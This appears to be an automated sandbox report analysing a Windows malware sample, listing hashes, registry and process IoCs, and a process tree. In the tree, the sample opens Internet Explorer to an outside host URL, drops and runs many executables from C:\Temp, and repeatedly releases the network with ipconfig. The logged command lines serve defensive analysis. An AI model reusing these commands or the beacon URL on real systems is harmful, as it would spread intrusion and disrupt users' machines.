31ef0836f92c366edf3d3f8a6c6d8e5976096b3fedf42135cf02a6006c0fd795

Analysis

max time kernel
149s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
04/01/2024, 04:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3ff13885305d4bae71cc76a04fec27d4.exe
Size

361KB
MD5

3ff13885305d4bae71cc76a04fec27d4
SHA1

32b56de1e58b8b5ff994135994f3415319cb588c
SHA256

31ef0836f92c366edf3d3f8a6c6d8e5976096b3fedf42135cf02a6006c0fd795
SHA512

e14eb806808e8b26c1402dcd2c3eddf2d89fa01fd113d2ce5dfa1282565579a06463219b204d5ec6a68092f73cfd7e13a93fed3b1dd3842355318e9549326b01
SSDEEP

6144:AflfAsiL4lIJjiJcbI03GBc3ucY5DCSjX:AflfAsiVGjSGecvX

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 64 IoCs

pid	Process
416	ztrljwtomgeywqoj.exe
4908	CreateProcess.exe
928	bztrljdbwt.exe
3628	CreateProcess.exe
1376	CreateProcess.exe
5044	i_bztrljdbwt.exe
5072	CreateProcess.exe
4644	ztrljebwto.exe
2748	CreateProcess.exe
4408	CreateProcess.exe
4284	i_ztrljebwto.exe
1464	CreateProcess.exe
4844	ytnlgdywqo.exe
432	CreateProcess.exe
4224	CreateProcess.exe
4872	i_ytnlgdywqo.exe
656	CreateProcess.exe
1848	tnlfdyvqni.exe
3364	CreateProcess.exe
1732	CreateProcess.exe
4848	i_tnlfdyvqni.exe
2456	CreateProcess.exe
236	qkicausnkf.exe
4476	CreateProcess.exe
4976	CreateProcess.exe
4536	i_qkicausnkf.exe
2476	CreateProcess.exe
4424	vpnhfaxspk.exe
1152	CreateProcess.exe
3968	CreateProcess.exe
884	i_vpnhfaxspk.exe
4848	CreateProcess.exe
3360	mkecxupnhf.exe
2064	CreateProcess.exe
2408	CreateProcess.exe
4376	i_mkecxupnhf.exe
1088	CreateProcess.exe
4888	kecwupmhez.exe
3364	CreateProcess.exe
4332	CreateProcess.exe
2108	i_kecwupmhez.exe
3580	CreateProcess.exe
2060	hbztrljebw.exe
2524	CreateProcess.exe
4360	CreateProcess.exe
3364	i_hbztrljebw.exe
4048	CreateProcess.exe
3876	mgbztrljdb.exe
212	CreateProcess.exe
3612	CreateProcess.exe
1248	i_mgbztrljdb.exe
3580	CreateProcess.exe
3184	gbytrljdbw.exe
4588	CreateProcess.exe
4044	CreateProcess.exe
3320	i_gbytrljdbw.exe
4848	CreateProcess.exe
64	avtnlgdyvq.exe
4568	CreateProcess.exe
1740	CreateProcess.exe
4412	i_avtnlgdyvq.exe
1224	CreateProcess.exe
4252	dxvifaysqk.exe
4380	CreateProcess.exe

Gathers network information 2 TTPs 20 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
1728	ipconfig.exe
1600	ipconfig.exe
4520	ipconfig.exe
4996	ipconfig.exe
2476	ipconfig.exe
2108	ipconfig.exe
3996	ipconfig.exe
2076	ipconfig.exe
248	ipconfig.exe
5112	ipconfig.exe
4888	ipconfig.exe
2056	ipconfig.exe
1972	ipconfig.exe
4948	ipconfig.exe
4664	ipconfig.exe
2272	ipconfig.exe
220	ipconfig.exe
3612	ipconfig.exe
2756	ipconfig.exe
5040	ipconfig.exe

Modifies Internet Explorer settings 1 TTPs 39 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31080138"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 201ab10cca3eda01	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "224966881"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31080138"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "203248299"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "203248299"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 20a9ae0cca3eda01	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "224966881"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31080138"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\""	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000005d05a5489e56c74eaa6b39ab0831a11f00000000020000000000106600000001000020000000b3a7a626db414fb4e1bc149f92890a1bf1c1c4025929d602a0c8d5bf1728d06e000000000e8000000002000020000000e423a8b45cf3dd35ca0f6cfac0cf661a4ed7b0409f13a1445b976acf5cef5d8620000000592b6b57d59352b4531bd39dd2d73ea34e52e2b9ab037d8c8bb59e2ab9b42590400000005d630568bdf799d7582168e6b7556e01b8913e1bf8c6188d0b65d1374ee637e25c97d868095ab4790fa86fa750789fffdc7cec441c064922e3a44b3ec2ca0840	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{379E50B5-AABD-11EE-8184-527BFEDB591A} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31080138"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "411108990"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000005d05a5489e56c74eaa6b39ab0831a11f000000000200000000001066000000010000200000005860fc91c01cae00d3396add4f924daa0ea35410fb0caacebc48fcf8de329640000000000e8000000002000020000000f135a50c74831e762b7ba0d5554e98b0cfeb871126410aa03abbc3177098f81a20000000e4a99306cdfb0fec5d412bd2c4bc9b885898e77d23a5f2625fe4426b93189d1c40000000a99df46ca2946d987ca393b77802a0d9e684521873c2a8fa0bb57f6f4de48ead0ebf7a5e1bbafd7bccffc3d2629c11330e2ccdc80e72c2d74db0cd898c0d348d	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
416	ztrljwtomgeywqoj.exe
416	ztrljwtomgeywqoj.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
416	ztrljwtomgeywqoj.exe
416	ztrljwtomgeywqoj.exe
416	ztrljwtomgeywqoj.exe
416	ztrljwtomgeywqoj.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
416	ztrljwtomgeywqoj.exe
416	ztrljwtomgeywqoj.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
416	ztrljwtomgeywqoj.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
416	ztrljwtomgeywqoj.exe
416	ztrljwtomgeywqoj.exe
416	ztrljwtomgeywqoj.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
416	ztrljwtomgeywqoj.exe
416	ztrljwtomgeywqoj.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe
1372	3ff13885305d4bae71cc76a04fec27d4.exe

Suspicious behavior: LoadsDriver 20 IoCs

pid	Process
644	Process not Found
644	Process not Found
644	Process not Found
644	Process not Found
644	Process not Found
644	Process not Found
644	Process not Found
644	Process not Found
644	Process not Found
644	Process not Found
644	Process not Found
644	Process not Found
644	Process not Found
644	Process not Found
644	Process not Found
644	Process not Found
644	Process not Found
644	Process not Found
644	Process not Found
644	Process not Found

Suspicious use of AdjustPrivilegeToken 20 IoCs

description	pid	Process
Token: SeDebugPrivilege	5044	i_bztrljdbwt.exe
Token: SeDebugPrivilege	4284	i_ztrljebwto.exe
Token: SeDebugPrivilege	4872	i_ytnlgdywqo.exe
Token: SeDebugPrivilege	4848	i_tnlfdyvqni.exe
Token: SeDebugPrivilege	4536	i_qkicausnkf.exe
Token: SeDebugPrivilege	884	i_vpnhfaxspk.exe
Token: SeDebugPrivilege	4376	i_mkecxupnhf.exe
Token: SeDebugPrivilege	2108	i_kecwupmhez.exe
Token: SeDebugPrivilege	3364	i_hbztrljebw.exe
Token: SeDebugPrivilege	1248	i_mgbztrljdb.exe
Token: SeDebugPrivilege	3320	i_gbytrljdbw.exe
Token: SeDebugPrivilege	4412	i_avtnlgdyvq.exe
Token: SeDebugPrivilege	1840	i_dxvifaysqk.exe
Token: SeDebugPrivilege	248	i_xsqkicausn.exe
Token: SeDebugPrivilege	4268	i_smkfcxvpnh.exe
Token: SeDebugPrivilege	4664	i_mhfzxrpjhc.exe
Token: SeDebugPrivilege	392	i_pjhczusecw.exe
Token: SeDebugPrivilege	3856	i_jhbztrmjec.exe
Token: SeDebugPrivilege	392	i_dbwtomgeyw.exe
Token: SeDebugPrivilege	3856	i_bvtnlgdywq.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2648	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
2648	iexplore.exe
2648	iexplore.exe
1796	IEXPLORE.EXE
1796	IEXPLORE.EXE
1796	IEXPLORE.EXE
1796	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1372 wrote to memory of 416	1372	3ff13885305d4bae71cc76a04fec27d4.exe	96
PID 1372 wrote to memory of 416	1372	3ff13885305d4bae71cc76a04fec27d4.exe	96
PID 1372 wrote to memory of 416	1372	3ff13885305d4bae71cc76a04fec27d4.exe	96
PID 1372 wrote to memory of 2648	1372	3ff13885305d4bae71cc76a04fec27d4.exe	94
PID 1372 wrote to memory of 2648	1372	3ff13885305d4bae71cc76a04fec27d4.exe	94
PID 2648 wrote to memory of 1796	2648	iexplore.exe	95
PID 2648 wrote to memory of 1796	2648	iexplore.exe	95
PID 2648 wrote to memory of 1796	2648	iexplore.exe	95
PID 416 wrote to memory of 4908	416	ztrljwtomgeywqoj.exe	102
PID 416 wrote to memory of 4908	416	ztrljwtomgeywqoj.exe	102
PID 416 wrote to memory of 4908	416	ztrljwtomgeywqoj.exe	102
PID 928 wrote to memory of 3628	928	bztrljdbwt.exe	100
PID 928 wrote to memory of 3628	928	bztrljdbwt.exe	100
PID 928 wrote to memory of 3628	928	bztrljdbwt.exe	100
PID 416 wrote to memory of 1376	416	ztrljwtomgeywqoj.exe	104
PID 416 wrote to memory of 1376	416	ztrljwtomgeywqoj.exe	104
PID 416 wrote to memory of 1376	416	ztrljwtomgeywqoj.exe	104
PID 416 wrote to memory of 5072	416	ztrljwtomgeywqoj.exe	109
PID 416 wrote to memory of 5072	416	ztrljwtomgeywqoj.exe	109
PID 416 wrote to memory of 5072	416	ztrljwtomgeywqoj.exe	109
PID 4644 wrote to memory of 2748	4644	ztrljebwto.exe	107
PID 4644 wrote to memory of 2748	4644	ztrljebwto.exe	107
PID 4644 wrote to memory of 2748	4644	ztrljebwto.exe	107
PID 416 wrote to memory of 4408	416	ztrljwtomgeywqoj.exe	111
PID 416 wrote to memory of 4408	416	ztrljwtomgeywqoj.exe	111
PID 416 wrote to memory of 4408	416	ztrljwtomgeywqoj.exe	111
PID 416 wrote to memory of 1464	416	ztrljwtomgeywqoj.exe	121
PID 416 wrote to memory of 1464	416	ztrljwtomgeywqoj.exe	121
PID 416 wrote to memory of 1464	416	ztrljwtomgeywqoj.exe	121
PID 4844 wrote to memory of 432	4844	ytnlgdywqo.exe	119
PID 4844 wrote to memory of 432	4844	ytnlgdywqo.exe	119
PID 4844 wrote to memory of 432	4844	ytnlgdywqo.exe	119
PID 416 wrote to memory of 4224	416	ztrljwtomgeywqoj.exe	122
PID 416 wrote to memory of 4224	416	ztrljwtomgeywqoj.exe	122
PID 416 wrote to memory of 4224	416	ztrljwtomgeywqoj.exe	122
PID 416 wrote to memory of 656	416	ztrljwtomgeywqoj.exe	126
PID 416 wrote to memory of 656	416	ztrljwtomgeywqoj.exe	126
PID 416 wrote to memory of 656	416	ztrljwtomgeywqoj.exe	126
PID 1848 wrote to memory of 3364	1848	tnlfdyvqni.exe	128
PID 1848 wrote to memory of 3364	1848	tnlfdyvqni.exe	128
PID 1848 wrote to memory of 3364	1848	tnlfdyvqni.exe	128
PID 416 wrote to memory of 1732	416	ztrljwtomgeywqoj.exe	133
PID 416 wrote to memory of 1732	416	ztrljwtomgeywqoj.exe	133
PID 416 wrote to memory of 1732	416	ztrljwtomgeywqoj.exe	133
PID 416 wrote to memory of 2456	416	ztrljwtomgeywqoj.exe	135
PID 416 wrote to memory of 2456	416	ztrljwtomgeywqoj.exe	135
PID 416 wrote to memory of 2456	416	ztrljwtomgeywqoj.exe	135
PID 236 wrote to memory of 4476	236	qkicausnkf.exe	137
PID 236 wrote to memory of 4476	236	qkicausnkf.exe	137
PID 236 wrote to memory of 4476	236	qkicausnkf.exe	137
PID 416 wrote to memory of 4976	416	ztrljwtomgeywqoj.exe	140
PID 416 wrote to memory of 4976	416	ztrljwtomgeywqoj.exe	140
PID 416 wrote to memory of 4976	416	ztrljwtomgeywqoj.exe	140
PID 416 wrote to memory of 2476	416	ztrljwtomgeywqoj.exe	142
PID 416 wrote to memory of 2476	416	ztrljwtomgeywqoj.exe	142
PID 416 wrote to memory of 2476	416	ztrljwtomgeywqoj.exe	142
PID 4424 wrote to memory of 1152	4424	vpnhfaxspk.exe	144
PID 4424 wrote to memory of 1152	4424	vpnhfaxspk.exe	144
PID 4424 wrote to memory of 1152	4424	vpnhfaxspk.exe	144
PID 416 wrote to memory of 3968	416	ztrljwtomgeywqoj.exe	147
PID 416 wrote to memory of 3968	416	ztrljwtomgeywqoj.exe	147
PID 416 wrote to memory of 3968	416	ztrljwtomgeywqoj.exe	147
PID 416 wrote to memory of 4848	416	ztrljwtomgeywqoj.exe	149
PID 416 wrote to memory of 4848	416	ztrljwtomgeywqoj.exe	149

C:\Users\Admin\AppData\Local\Temp\3ff13885305d4bae71cc76a04fec27d4.exe
"C:\Users\Admin\AppData\Local\Temp\3ff13885305d4bae71cc76a04fec27d4.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1372
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" http://xytets.com:2345/t.asp?os=home
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2648
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2648 CREDAT:17410 /prefetch:2
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:1796
- C:\Temp\ztrljwtomgeywqoj.exe
  C:\Temp\ztrljwtomgeywqoj.exe run
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:416
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\bztrljdbwt.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:4908
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_bztrljdbwt.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:1376
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\ztrljebwto.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:5072
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_ztrljebwto.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:4408
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\ytnlgdywqo.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:1464
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_ytnlgdywqo.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:4224
  - - C:\Temp\i_ytnlgdywqo.exe
      C:\Temp\i_ytnlgdywqo.exe ups_ins
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:4872
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\tnlfdyvqni.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:656
  - - C:\Temp\tnlfdyvqni.exe
      C:\Temp\tnlfdyvqni.exe ups_run
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1848
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:3364
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:4996
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:2476
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_tnlfdyvqni.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:1732
  - - C:\Temp\i_tnlfdyvqni.exe
      C:\Temp\i_tnlfdyvqni.exe ups_ins
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:4848
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\qkicausnkf.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:2456
  - - C:\Temp\qkicausnkf.exe
      C:\Temp\qkicausnkf.exe ups_run
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:236
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:4476
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:3612
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_qkicausnkf.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:4976
  - - C:\Temp\i_qkicausnkf.exe
      C:\Temp\i_qkicausnkf.exe ups_ins
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:4536
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\vpnhfaxspk.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:2476
  - - C:\Temp\vpnhfaxspk.exe
      C:\Temp\vpnhfaxspk.exe ups_run
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4424
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:1152
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:4888
        
        C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        7⤵
        Executes dropped EXE
        
        PID:3364
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_vpnhfaxspk.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:3968
  - - C:\Temp\i_vpnhfaxspk.exe
      C:\Temp\i_vpnhfaxspk.exe ups_ins
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:884
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\mkecxupnhf.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:4848
  - - C:\Temp\mkecxupnhf.exe
      C:\Temp\mkecxupnhf.exe ups_run
      4⤵
      Executes dropped EXE
      PID:3360
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:2064
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:2056
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_mkecxupnhf.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:2408
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\kecwupmhez.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:1088
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_kecwupmhez.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:4332
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\hbztrljebw.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:3580
  - - C:\Temp\hbztrljebw.exe
      C:\Temp\hbztrljebw.exe ups_run
      4⤵
      Executes dropped EXE
      PID:2060
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:2524
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:2756
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_hbztrljebw.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:4360
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\mgbztrljdb.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:4048
  - - C:\Temp\mgbztrljdb.exe
      C:\Temp\mgbztrljdb.exe ups_run
      4⤵
